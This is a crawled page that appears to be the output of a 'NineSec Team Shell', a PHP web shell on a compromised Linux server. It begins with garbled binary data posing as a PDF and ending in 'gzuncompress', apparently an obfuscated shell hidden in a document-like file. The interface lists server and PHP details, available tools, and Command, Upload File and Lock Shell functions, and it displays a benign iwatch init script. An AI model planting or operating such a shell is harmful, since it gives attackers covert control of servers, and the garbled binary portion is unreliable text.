%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /etc/ghostscript/../sgml/../rc0.d/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/ghostscript/../sgml/../rc0.d/K01iwatch
#!/bin/sh
### BEGIN INIT INFO
# Provides:          iwatch
# Required-Start:    $remote_fs
# Required-Stop:     $remote_fs
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: iwatch daemon control
# Description:       Start iwatch, realtime filesystem monitoring
#                    program using inotify
### END INIT INFO

set -eu

##############################################################################

CONFIG_FILE=/etc/iwatch/iwatch.xml
DEBIANCONFIG=/etc/default/iwatch
IWATCHD=/usr/bin/iwatch
PATH=/usr/sbin:/usr/bin:/sbin:/bin
PIDFILE=/var/run/iwatch.pid
START_DAEMON=true

test -x $IWATCHD || exit 0

test -f $DEBIANCONFIG && . $DEBIANCONFIG

. /lib/lsb/init-functions

is_true()
{
  case "${1:-}" in
    [Yy]es|[Yy]|1|[Tt]|[Tt]rue) return 0;;
    *) return 1;
  esac
}

##############################################################################

case "${1:-}" in
    start)
      if [ -f "$PIDFILE" ] ; then
         log_warning_msg "Warning: iwatch daemon already running, doing nothing therefore."
         exit 0
      fi

      if is_true $START_DAEMON; then
         log_daemon_msg "Starting iwatch daemon" "iwatch"
         set +e
         $IWATCHD -f $CONFIG_FILE -p $PIDFILE -d
         RC=$?
         set -e
         log_end_msg $RC
      else
         log_warning_msg "Not starting iwatch daemon as startup is deactivated via /etc/default/iwatch"
      fi
      ;;

    stop)
      if [ -f "$PIDFILE" ] ; then
         log_daemon_msg "Stopping iwatch daemon" "iwatch"
         set +e
         start-stop-daemon -K -p $PIDFILE
         RC=$?
         rm -f $PIDFILE
         set -e
         log_end_msg $RC
      else
         log_warning_msg "iwatch daemon already stopped."
      fi
      ;;

    status)
      [ -f "$PIDFILE" ] && PROCESS="$(cat $PIDFILE)" || PROCESS=''
      if [ -n "$PROCESS" ] ; then
         log_success_msg "iwatch daemon with pid $PROCESS is running"
         exit 0
      else
         log_warning_msg "Could not find a running iwatch daemon."
         exit 1
      fi
      ;;

    restart)
      $0 stop
      $0 start
      ;;

    reload|force-reload)
      if [ -f "$PIDFILE" ] ; then
         log_daemon_msg "Reloading iwatch daemon" "iwatch"
         start-stop-daemon --stop --signal 1 --pidfile $PIDFILE
         RC=$?
         log_end_msg $RC
      else
         log_warning_msg "Could not find a running iwatch daemon."
         exit 1
      fi
      ;;

    *)
      echo "Usage: ${0:-} {start|stop|restart|reload|force-reload|status}" >&2
      exit 1
    ;;
esac

exit 0

NineSec Team - 2022